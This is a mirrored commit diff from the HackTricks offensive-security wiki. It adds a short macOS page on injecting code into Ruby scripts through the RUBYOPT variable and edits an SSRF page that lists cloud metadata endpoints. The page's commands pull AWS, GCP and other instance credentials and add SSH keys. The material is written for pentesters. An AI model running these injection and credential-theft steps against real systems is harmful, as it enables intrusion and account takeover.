mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
GITBOOK-4241: change request with no subject merged in GitBook
This commit is contained in:
parent
f0447c9b2e
commit
f00afc243f
4 changed files with 85 additions and 16 deletions
|
@ -179,6 +179,7 @@
|
||||||
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
|
* [macOS Library Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/README.md)
|
||||||
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
* [macOS Dyld Hijacking & DYLD\_INSERT\_LIBRARIES](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld\_insert\_libraries.md)
|
||||||
* [macOS Perl Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md)
|
* [macOS Perl Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-perl-applications-injection.md)
|
||||||
|
* [macOS Ruby Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ruby-applications-injection.md)
|
||||||
* [macOS .Net Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md)
|
* [macOS .Net Applications Injection](macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-.net-applications-injection.md)
|
||||||
* [macOS Security Protections](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md)
|
* [macOS Security Protections](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/README.md)
|
||||||
* [macOS Gatekeeper / Quarantine / XProtect](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md)
|
* [macOS Gatekeeper / Quarantine / XProtect](macos-hardening/macos-security-and-privilege-escalation/macos-security-protections/macos-gatekeeper.md)
|
||||||
|
|
|
@ -82,6 +82,14 @@ Check different options to make a Perl script execute arbitrary code in:
|
||||||
[macos-perl-applications-injection.md](macos-perl-applications-injection.md)
|
[macos-perl-applications-injection.md](macos-perl-applications-injection.md)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
### Ruby Injection
|
||||||
|
|
||||||
|
I't also possible to abuse ruby env variables to make arbitrary scripts execute arbitrary code:
|
||||||
|
|
||||||
|
{% content-ref url="macos-ruby-applications-injection.md" %}
|
||||||
|
[macos-ruby-applications-injection.md](macos-ruby-applications-injection.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Python Injection
|
### Python Injection
|
||||||
|
|
||||||
If the environment variable **`PYTHONINSPECT`** is set, the python process will drop into a python cli once it's finished. It's also possible to use **`PYTHONSTARTUP`** to indicate a python script to execute at the beginning of an interactive session.\
|
If the environment variable **`PYTHONINSPECT`** is set, the python process will drop into a python cli once it's finished. It's also possible to use **`PYTHONSTARTUP`** to indicate a python script to execute at the beginning of an interactive session.\
|
||||||
|
|
|
@ -0,0 +1,61 @@
|
||||||
|
# macOS Ruby Applications Injection
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## RUBYOPT
|
||||||
|
|
||||||
|
Using this env variable it's possible to **add new params** to **ruby** whenever it gets executed. Although the param **`-e`** cannot be used to specify ruby code to execute, it's possible to use the params **`-I`** and **`-r`** to add a new folder to the libraries to load path and then **specify a library to load**.
|
||||||
|
|
||||||
|
Create the library **`inject.rb`** in **`/tmp`**:
|
||||||
|
|
||||||
|
{% code title="inject.rb" %}
|
||||||
|
```ruby
|
||||||
|
puts `whoami`
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
Create anywahere a ruby script like:
|
||||||
|
|
||||||
|
{% code title="hello.rb" %}
|
||||||
|
```ruby
|
||||||
|
puts 'Hello, World!'
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
Then make an arbitrary ruby script load it with:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
RUBYOPT="-I/tmp -rinject" ruby hello.rb
|
||||||
|
```
|
||||||
|
|
||||||
|
Fun fact, it works even with param **`--disable-rubyopt`**:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||||
|
|
||||||
|
@ -133,7 +133,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null |
|
||||||
Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role.
|
Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
### SSRF for AWS Lambda <a href="#6f97" id="6f97"></a>
|
### SSRF for AWS Lambda <a href="#id-6f97" id="id-6f97"></a>
|
||||||
|
|
||||||
In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**.
|
In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**.
|
||||||
|
|
||||||
|
@ -149,7 +149,7 @@ Moreover, in addition to IAM credentials, Lambda functions also have **event dat
|
||||||
Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app.
|
Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app.
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
### SSRF URL for AWS Elastic Beanstalk <a href="#6f97" id="6f97"></a>
|
### SSRF URL for AWS Elastic Beanstalk <a href="#id-6f97" id="id-6f97"></a>
|
||||||
|
|
||||||
We retrieve the `accountId` and `region` from the API.
|
We retrieve the `accountId` and `region` from the API.
|
||||||
|
|
||||||
|
@ -168,13 +168,13 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean
|
||||||
|
|
||||||
Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
|
Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
|
||||||
|
|
||||||
## GCP <a href="#6440" id="6440"></a>
|
## GCP <a href="#id-6440" id="id-6440"></a>
|
||||||
|
|
||||||
You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
|
You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
|
||||||
|
|
||||||
### SSRF URL for Google Cloud <a href="#6440" id="6440"></a>
|
### SSRF URL for Google Cloud <a href="#id-6440" id="id-6440"></a>
|
||||||
|
|
||||||
Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" and you can access the metadata endpoint in with the following URLs:
|
Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs:
|
||||||
|
|
||||||
* http://169.254.169.254
|
* http://169.254.169.254
|
||||||
* http://metadata.google.internal
|
* http://metadata.google.internal
|
||||||
|
@ -284,7 +284,7 @@ gcloud config unset auth/access_token_file
|
||||||
```
|
```
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
### Add an SSH key <a href="#3e24" id="3e24"></a>
|
### Add an SSH key <a href="#id-3e24" id="id-3e24"></a>
|
||||||
|
|
||||||
Extract the token
|
Extract the token
|
||||||
|
|
||||||
|
@ -315,7 +315,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo
|
||||||
```
|
```
|
||||||
{% endcode %}
|
{% endcode %}
|
||||||
|
|
||||||
## Digital Ocean <a href="#9f1f" id="9f1f"></a>
|
## Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a>
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials
|
There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials
|
||||||
|
@ -335,7 +335,7 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re
|
||||||
curl http://169.254.169.254/metadata/v1.json | jq
|
curl http://169.254.169.254/metadata/v1.json | jq
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||||
|
|
||||||
|
@ -477,7 +477,7 @@ At line:1 char:1
|
||||||
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
|
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
|
||||||
```
|
```
|
||||||
|
|
||||||
## IBM Cloud <a href="#2af0" id="2af0"></a>
|
## IBM Cloud <a href="#id-2af0" id="id-2af0"></a>
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM
|
Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM
|
||||||
|
@ -509,11 +509,11 @@ curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instanc
|
||||||
```
|
```
|
||||||
{% endcode %}
|
{% endcode %}
|
||||||
|
|
||||||
## Packetcloud <a href="#2af0" id="2af0"></a>
|
## Packetcloud <a href="#id-2af0" id="id-2af0"></a>
|
||||||
|
|
||||||
Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
|
Documentation available at [`https://metadata.packet.net/userdata`](https://metadata.packet.net/userdata)
|
||||||
|
|
||||||
## OpenStack/RackSpace <a href="#2ffc" id="2ffc"></a>
|
## OpenStack/RackSpace <a href="#id-2ffc" id="id-2ffc"></a>
|
||||||
|
|
||||||
(header required? unknown)
|
(header required? unknown)
|
||||||
|
|
||||||
|
@ -538,7 +538,7 @@ http://192.0.0.192/latest/meta-data/
|
||||||
http://192.0.0.192/latest/attributes/
|
http://192.0.0.192/latest/attributes/
|
||||||
```
|
```
|
||||||
|
|
||||||
## Alibaba <a href="#51bd" id="51bd"></a>
|
## Alibaba <a href="#id-51bd" id="id-51bd"></a>
|
||||||
|
|
||||||
```
|
```
|
||||||
http://100.100.100.200/latest/meta-data/
|
http://100.100.100.200/latest/meta-data/
|
||||||
|
@ -564,19 +564,18 @@ bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/containers/json
|
||||||
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
|
bash-4.4# curl --unix-socket /var/run/docker.sock http://foo/images/json
|
||||||
```
|
```
|
||||||
|
|
||||||
## Rancher <a href="#8cb7" id="8cb7"></a>
|
## Rancher <a href="#id-8cb7" id="id-8cb7"></a>
|
||||||
|
|
||||||
```
|
```
|
||||||
curl http://rancher-metadata/<version>/<path>
|
curl http://rancher-metadata/<version>/<path>
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
|
||||||
|
|
||||||
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
Loading…
Reference in a new issue